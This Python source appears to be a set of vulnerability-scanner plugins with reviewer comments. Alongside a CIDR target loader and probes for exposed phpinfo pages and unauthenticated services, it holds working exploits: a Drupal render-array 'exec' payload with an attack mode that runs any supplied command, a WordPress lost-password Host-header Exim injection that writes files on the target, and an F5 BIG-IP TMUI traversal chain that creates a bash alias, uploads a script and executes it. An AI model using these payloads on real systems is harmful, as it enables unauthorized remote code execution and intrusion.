def init(self):
    """Populate the plugin's target list from a CIDR range.

    The range is read, in priority order, from the ``CIDR`` environment
    variable, then from ``conf.url`` (cleared once consumed so it is not
    also treated as a single target), and finally from an interactive
    prompt.  Every host address in the range is registered through
    ``self.add_target``; a malformed range is logged and adds no targets.
    """
    logger.info("[PLUGIN] try fetch targets from CIDR...")

    if "CIDR" in os.environ:
        cidr_source = os.environ.get("CIDR")
    elif conf.url:
        cidr_source = conf.url
        conf.url = ""
    else:
        cidr_source = input("Please input CIDR address:")

    added = 0
    try:
        # strict=False accepts a range whose host bits are set (e.g. 10.0.0.5/24).
        for host in ip_network(cidr_source, strict=False).hosts():
            self.add_target(host.exploded)
            added += 1
    except ValueError:
        logger.error("[PLUGIN] error format from " + cidr_source)

    logger.info("[PLUGIN] get {0} target(s) from CIDR".format(added))
def _attack(self):
    """Attack mode: submit the ``command`` option to the target and collect its output.

    Posts a registration-form AJAX request whose ``mail`` render element
    carries the configured command, then reads the command output from the
    ``data`` field of the first element of the JSON response.

    Returns ``self.parse_output(result)`` where ``result`` holds ``Stdout``
    only when the request returned HTTP 200 and the response parsed; any
    exception (connection error, non-JSON body, missing index or key) is
    logged and leaves ``result`` empty.
    """
    result = {}
    cmd = self.get_option("command")
    url = self.url.rstrip('/') + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
    payload = {
        'form_id': 'user_register_form',
        '_drupal_ajax': '1',
        'mail[#post_render][]': 'exec',
        'mail[#type]': 'markup',
        'mail[#markup]': '{}'.format(cmd)
    }
    try:
        # NOTE(review): no timeout is set, so an unresponsive host blocks the scan indefinitely.
        response = requests.post(url, data=payload)
        if response and response.status_code == 200:
            # The first JSON element is assumed to be the rendered output — IndexError/KeyError fall through to the except below.
            result['Stdout'] = json.loads(response.text)[0]['data']
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)
def _verify(self):
    """Verify mode: check whether the target renders a random marker via ``echo``.

    Posts a registration-form AJAX request whose ``mail`` render element
    echoes a 10-character random string, then looks for that string inside
    the ``data`` field of the response text.  On a match ``VerifyInfo``
    records the request URL and the post data.

    NOTE(review): ``requests.post`` sits outside the ``try`` block, so a
    connection error propagates to the caller instead of being logged like
    the other failures; the request also has no timeout.
    """
    result = {}
    flag = random_str(length=10)
    url = self.url.rstrip('/') + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
    payload = {
        'form_id': 'user_register_form',
        '_drupal_ajax': '1',
        'mail[#post_render][]': 'exec',
        'mail[#type]': 'markup',
        'mail[#markup]': 'echo "{0}";'.format(flag)
    }
    resp = requests.post(url, data=payload)
    try:
        # Match on the JSON fragment rather than parsing the body, so a partially valid response still counts.
        if '"data":"{0}'.format(flag) in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Postdata'] = payload
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)
def _verify(self):
    """Verify mode: test the lost-password form for a header-injected mail transport command.

    Sends the lost-password request with a ``Host`` header that embeds a
    mail-transport command string creating a marker file (random name,
    ``.txt``) under the ``writePath`` option, then fetches that file over
    HTTP.  An HTTP 200 on the fetch is treated as confirmation and
    ``VerifyInfo`` records the URL and the ``Host`` payload.

    NOTE(review): the marker file is never removed, so a successful check
    leaves an artifact on the target; neither request has a timeout; the
    ``try`` only wraps the status check, so request errors propagate; and
    ``urljoin(self.url, filename)`` replaces the last path segment of
    ``self.url`` when it does not end with ``/`` — confirm the fetch URL is
    the one intended.
    """
    result = {}
    filename = random_str(6) + '.txt'
    filename = filename.lower()
    url = urljoin(self.url, 'wp-login.php?action=lostpassword')
    cmd = '''{{run{{/bin/touch {abspathfilename}}}}}'''.format(
        abspathfilename=os.path.join(self.get_option('writePath'), filename))
    cmd = cmd.replace(' ', '${substr{10}{1}{$tod_log}}').replace(
        '/', '${substr{0}{1}{$spool_directory}}')
    # replace
    # ' ' -> '${substr{10}{1}{$tod_log}}'
    # '/' -> '${substr{0}{1}{$spool_directory}}'
    urlsp = urlsplit(url)
    payload = '{netloc}(any -froot@localhost -be ${cmd} null)'.format(
        netloc=urlsp.netloc.split(':')[0], cmd=cmd)
    # The Host field of this payload must not contain port information or it
    # will not work; i.e. only the default port 80 is usable.
    headers = {
        'Host': payload,
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data = {
        'wp-admin': 'Get+New+Password',
        'redirect_to': '',
        'user_login': self.get_option('username')
    }
    # The response of the lost-password post is not inspected; ``r`` is unused.
    r = requests.post(url=url, headers=headers, data=data)
    resp = requests.get(url=urljoin(self.url, filename))
    try:
        if resp.status_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Postdata'] = payload
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)
def _verify(self):
    """Verify mode: look for an exposed phpinfo() page at a few common paths.

    Each candidate path is fetched with a browser-like User-Agent, a 3 s
    timeout and TLS verification disabled; the first response that is HTTP
    200 and contains "PHP Version" is reported as ``VerifyInfo['url']``.
    A failed connection is logged for that path and the next one is tried.

    The result is passed through ``self.parse_attack`` (not ``parse_output``);
    confirm the base class defines that method.
    """
    result = {}
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
    }
    phpinfoList = ['/phpinfo.php', '/1.php', '/test.php']
    for path in phpinfoList:
        vulurl = "{}{}".format(self.url.rstrip('/'), path)
        try:
            # verify=False accepts any certificate, so self-signed and intercepted hosts are indistinguishable here.
            resp = requests.get(url=vulurl, headers=headers, timeout=3, verify=False)
            if "PHP Version" in resp.text and resp.status_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = vulurl
                return self.parse_attack(result)
        except Exception as e:
            # Only the URL is logged; the exception ``e`` itself is discarded.
            logger.error("connect target '{} failed!'".format(vulurl))
            pass
    return self.parse_attack(result)
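def _verify(self):
    """verify mode

    Probe the target host for services answering without authentication
    (redis, mongodb, memcached, elasticsearch, zookeeper, ftp, CouchDB,
    docker, Hadoop) and report when at least one probe returned a finding.

    Each ``self.<service>(ip)`` helper is defined elsewhere in the class; a
    probe that found nothing is expected to return ``False`` and a finding
    is expected to be a string.  Any exception raised by a probe is logged
    and yields an empty result.

    Returns ``self.parse_output(result)``; ``result['VerifyInfo']`` holds the
    host and the full list of probe results when anything was found.
    """
    result = {}
    ip = urlparse(self.url).hostname
    res_info = []
    try:
        probes = (
            self.redis, self.mongodb, self.memcached, self.elasticsearch,
            self.zookeeper, self.ftp, self.CouchDB, self.docker, self.Hadoop,
        )
        for probe in probes:
            res_info.append(probe(ip))
        # Fixed: the original bound ``res_sring`` and then read ``res_string``,
        # so the NameError was swallowed below and nothing was ever reported.
        res_string = ""
        for ri in res_info:
            if ri != False:
                # Non-string findings raise TypeError here and are logged like any other probe failure.
                res_string = res_string + ";" + ri
        if res_string != "":
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = ip
            result['VerifyInfo']['Info'] = res_info
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)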
def _verify(self):
    """Verify mode: check the TMUI workspace endpoints reachable through the ``login.jsp/..;/`` prefix.

    Five nested helpers are run in order, all against ``url`` built from the
    parsed scheme, host and port: ``delete_alias``/``create_alias`` manage a
    ``cli alias`` via ``tmshCmd.jsp``; ``upload_script`` writes ``cmd`` to
    ``fileName`` via ``fileSave.jsp``; ``upload_check`` reads it back via
    ``fileRead.jsp``; ``execute_script`` lists the file through the alias
    (up to ten attempts) until the response contains ``uid``; a final
    ``delete_alias`` removes the alias.

    Only when every step returns True does ``VerifyInfo`` get the URL and
    port and ``self.parse_output(result)`` is returned.  NOTE(review): if any
    step fails, or an exception is logged, the function falls off the end and
    returns ``None`` rather than ``self.parse_output({})`` — callers that
    expect a dict should check for that.  ``randstr`` and ``rpath`` are
    computed but unused, the outer ``headers`` is shadowed by every helper,
    no request has a timeout, ``print(req.text)`` writes raw output to
    stdout, and ``fileName`` is left on the target (only the alias is
    cleaned up).
    """
    result = {}
    randstr = random_str()  # unused
    protocol, host, port, rpath = self.parse_url(self.url)  # rpath unused
    url = protocol + "://" + str(host) + ":" + str(port)
    fileName = "/var/tmp/tdfgjkl"  # path written on the target
    cmd = "id"
    # // ==> \/\/
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
    }

    def create_alias():
        # enable bash
        payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        data = {"command": "create cli alias private list command bash"}
        req = requests.post(url + payload, headers=headers, data=data)
        # Returns True on an empty ``error`` field, otherwise falls through to None.
        if req.json()['error'] == "":
            return True

    def upload_script(fileName, cmd):
        # fileName ==> /tmp/ljkkasdv  arbitrary file upload
        payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        data = {"fileName": fileName, "content": cmd}
        req = requests.post(url + payload, headers=headers, data=data)
        # Only the status code is checked; the body is not inspected here.
        if req.status_code == 200:
            return True

    def upload_check(fileName, cmd):
        # arbitrary file read
        payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={}".format(
            fileName)
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        req = requests.get(url + payload, headers=headers)
        # The read-back body is JSON-escaped, so slashes in cmd are compared as "\/".
        if cmd.replace("/", "\\/") in req.text:
            logger.info("[+] Upload Success ! ==> {}".format(url + payload))
            return True

    def execute_script(fileName):
        # if "uid" in
        payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        data = {"command": "list {}".format(fileName)}
        for i in range(0, 10):
            # Repeating several times may succeed; usually it takes about 4 tries.
            req = requests.post(url + payload, headers=headers, data=data)
            if req.json()['error'] == "" and "uid" in req.text:
                # NOTE(review): debug print of the raw response body to stdout.
                print(req.text)
                logger.info("[+] Execute OK, Having a check ...")
                return True

    def delete_alias():
        payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        data = {"command": "delete cli alias private list"}
        req = requests.post(url + payload, headers=headers, data=data)
        if req.json()['error'] == "":
            return True

    try:
        # The alias may already exist from someone else; try deleting it first, otherwise an error is possible!!!
        delete_alias()
        if create_alias():
            if upload_script(fileName, cmd):
                if upload_check(fileName, cmd):
                    if execute_script(fileName):
                        if delete_alias():
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['URL'] = url
                            result['VerifyInfo']['Port'] = str(port)
                            return self.parse_output(result)
    except Exception as ex:
        # Logged but not re-raised; control then reaches the end of the function with no return value.
        logger.error(ex)